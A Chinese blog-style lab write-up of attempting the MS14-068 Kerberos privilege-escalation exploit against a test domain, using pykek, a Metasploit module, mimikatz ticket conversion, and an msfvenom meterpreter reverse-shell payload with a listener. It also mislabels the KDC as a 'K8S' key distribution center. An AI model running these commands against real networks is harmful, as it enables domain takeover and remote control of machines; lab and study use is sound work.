2014年，微软发布了一个紧急补丁，修复了Kerberos域用户提权漏洞（MS14-068），所有的Windows服务器操作系统都受到该漏洞的影响。该漏洞允许攻击者将域内任意用户权限，提升到域管理员级别。如果想利用这个漏洞，把自己变成域控管理员，只需要知道：

• 域内任意用户名
• SID
• 密码
• 域控IP地址

反正我觉得这本书上，对这一块讲的不咋滴，至少我没看到特权体现在哪？不知道大家怎么看？不过放心，这个知名的漏洞，肯定还会有后续的实验的~

漏洞原理：

• 用户向KDC（K8S秘钥分发中心）申请TGT（身份凭证）时
• 用户可以伪造自己的票据
• 如果票据声明自己有域管理员权限
• 而KDC在处理该票据时未验证票据的签名
• 那么返回给用户的TGT就拥有域管理员权限
• 用户将有域管理员权限的TGT发送到TGS（票据授权服务）
• 就会获得特权ST（服务票据）
• 于是可以访问域内的一切资源

步骤一：查看域控制器的补丁

• 没有KB3011780补丁
• 存在CVE-2014-6324（MS14-068漏洞）

步骤二：查看用户的SID

• ailx32：SID=S-1-5-21-1632228486-913648825-264583114-1001
• Administrator：SID=S-1-5-21-1632228486-913648825-264583114-500

步骤三：克隆pykek

• 下载地址：github项目
• ms14-068.py是pykek工具包中的漏洞利用脚本

步骤四：生成高权限票据

• 普通域用户名：ailx32
• 域：hackbiji.top
• 普通SID：S-1-5-21-1632228486-913648825-264583114-1001
• 域控IP： 192.168.160.143
• 普通账号密码：W2ngluoanquan

python ms14-068.py -u ailx32@hackbiji.top -s S-1-5-21-1632228486-913648825-264583114-1001 -d 192.168.160.143 -p W2ngluoanquan

步骤五：验证权限

• 低权限的票据，无效

• 高权限票据，无效

• 最后结论就是，我票据确实导入了呀
• 但是它死活不能用普通身份获得IPC通道

• 如果知道用户名和密码，那么是可以直接获得IPC通道的呀
• 何必搞的那么复杂呢？

• 更可气的是，我啥也没干，通过管理员权限运行cmd，就已经拿到IPC权限了
• 蜜汁操作

后续实验来了：抓紧时间收藏~

一、在metasploit中实验

• 利用ms14-068漏洞
• 生成20200926141524_default_192.168.160.143_windows.kerberos_231623.bin
• 需要通过mimikatz进行一下格式转换

use auxiliary/admin/kerberos/ms14_068_kerberos_checksum

二、在mimikatz中进行格式转换

• 获得kirbi格式的文件
• 留着后面提权用

kerberos::clist "20200926141524_default_192.168.160.143_windows.kerberos_231623.bin" /export

三、生成一个反向shell的木马

• 获得hack.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.160.140 LPORT=5555 -f exe > hack.exe

四、监听木马的来信

• 通过metasploit监听5555端口

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 5555

五、鱼儿上钩

• 获得普通权限 hackbiji\ailx32

六、导入票据

• 狗屁，报错（Kerberos ticket application failed.）
• 骗子

本篇完~